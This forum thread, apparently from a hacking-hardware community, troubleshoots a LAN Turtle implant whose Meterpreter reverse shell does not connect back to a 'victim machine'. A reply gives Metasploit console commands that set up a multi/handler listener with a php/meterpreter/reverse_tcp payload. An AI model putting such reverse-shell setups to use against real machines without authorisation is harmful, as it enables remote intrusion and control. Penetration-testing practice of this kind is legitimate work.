DranIQ Posted January 24, 2016 Share Posted January 24, 2016 So I configure the meterpreter module correctly and set up my Metasploit listener, but when I connect the LAN turtle to the victim machine this is what I see. 1 Quote Link to comment Share on other sites More sharing options...
m40295 Posted January 31, 2016 Share Posted January 31, 2016 I had the same issue and found this It appears that you used the windows payload with your handler. Be sure to set your payload to php/meterpreter/reverse_tcp to get the correct payload and protocol setup. msf > use exploit/multi/handler msf exploit(handler) > set lhost 192.168.56.1 lhost => 192.168.56.1 msf exploit(handler) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp 1 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.